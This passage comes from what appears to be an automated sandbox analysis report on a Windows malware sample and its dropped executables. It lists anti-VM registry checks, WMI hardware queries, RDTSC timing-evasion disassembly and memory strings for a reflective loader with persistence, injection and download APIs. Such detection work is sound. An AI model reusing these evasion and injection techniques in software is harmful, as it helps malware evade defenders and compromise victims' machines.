                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-9810
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-9745
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: svchost.exe, 0000001A.00000002.2297417537.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: ZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEXW
                      Source: 2DB3A69DE7692371543510.exe, 00000017.00000003.2296160005.0000000000A40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HZEROX64MADE IN ALGERIA <3REFLECTIVELOADERSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNGQGWZDSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDER.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.DLLREGOPENKEYEXWADVAPI32.DLLREGSETVALUEEX
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AEF4E second address: 2AEF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AEF54 second address: 2AEF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424566 second address: 42456A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42456A second address: 42458A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F7E2CEC3D44h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424DA3 second address: 424DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7E2CEB1B25h 0x0000000b jmp 00007F7E2CEB1B25h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424DD3 second address: 424DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424DD7 second address: 424DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 428495 second address: 4284C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 75170F93h 0x0000000d mov edx, dword ptr [ebp+122D2C88h] 0x00000013 lea ebx, dword ptr [ebp+1244D0CCh] 0x00000019 sub dword ptr [ebp+122D1CC3h], ecx 0x0000001f add edi, dword ptr [ebp+122D2F5Ch] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4284C0 second address: 4284CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4284CB second address: 4284E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7E2CEC3D3Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4202E0 second address: 4202F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F7E2CEB1B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEB1B1Bh 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 445FE9 second address: 446018 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E2CEC3D3Bh 0x0000000b jmp 00007F7E2CEC3D48h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446018 second address: 446034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEB1B28h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4461B4 second address: 4461BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4461BE second address: 4461F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F7E2CEB1B3Ah 0x0000000e jmp 00007F7E2CEB1B28h 0x00000013 jmp 00007F7E2CEB1B1Ch 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4461F0 second address: 446202 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E2CEC3D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446202 second address: 446206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4464D8 second address: 4464FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F7E2CEC3D45h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4464FB second address: 446507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446507 second address: 446520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CEC3D45h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446520 second address: 44653D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4466B3 second address: 4466C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jng 00007F7E2CEC3D42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4466C2 second address: 4466C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4467E3 second address: 4467E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4467E7 second address: 446806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C03 second address: 446C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7E2CEC3D36h 0x0000000a pop esi 0x0000000b jmp 00007F7E2CEC3D49h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C27 second address: 446C2C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C2C second address: 446C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C39 second address: 446C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 446C3D second address: 446C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F7E2CEC3D4Bh 0x00000010 jmp 00007F7E2CEC3D43h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
